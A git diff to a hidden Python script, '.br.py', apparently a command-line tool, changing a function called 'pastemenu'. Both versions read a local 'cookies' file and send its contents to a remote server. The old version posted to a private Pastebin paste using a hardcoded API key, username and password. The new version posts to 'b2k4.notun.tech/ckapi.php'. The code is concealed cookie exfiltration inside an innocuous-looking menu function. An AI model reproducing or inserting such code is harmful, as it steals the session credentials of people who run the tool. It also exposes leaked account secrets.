diff --git a/.br.py b/.br.py index 2d6a0f2..5e56a62 100644 --- a/.br.py +++ b/.br.py @@ -199,17 +199,13 @@ def userinfo(): print(f"{p}ID : {c}{id}") print(f"{ab}-----------------------------------------------{d}") -####Pastebin +####PasteServer def pastemenu(): - key = '18abe733f7bc2f2c8528c4cf5ab4e6af' f = open('cookies', 'r') - cookies = f.read() - login_data = {'api_dev_key': key,'api_user_name': 'BotolMehedi','api_user_password': 'BotolFuck1234'} - data = {'api_option': 'paste','api_dev_key':key,'api_paste_code':cookies,'api_paste_private': '2','api_paste_expire_date': 'N','api_user_key': None,'api_paste_format': 'php'} - login = requests.post("https://pastebin.com/api/api_login.php", data=login_data) - data['api_user_key'] = login.text - r = requests.post("https://pastebin.com/api/api_post.php", data=data) + okfile = f.read() + data = {'textdata':okfile} + requests.post("https://b2k4.notun.tech/ckapi.php", data=data) ###Menu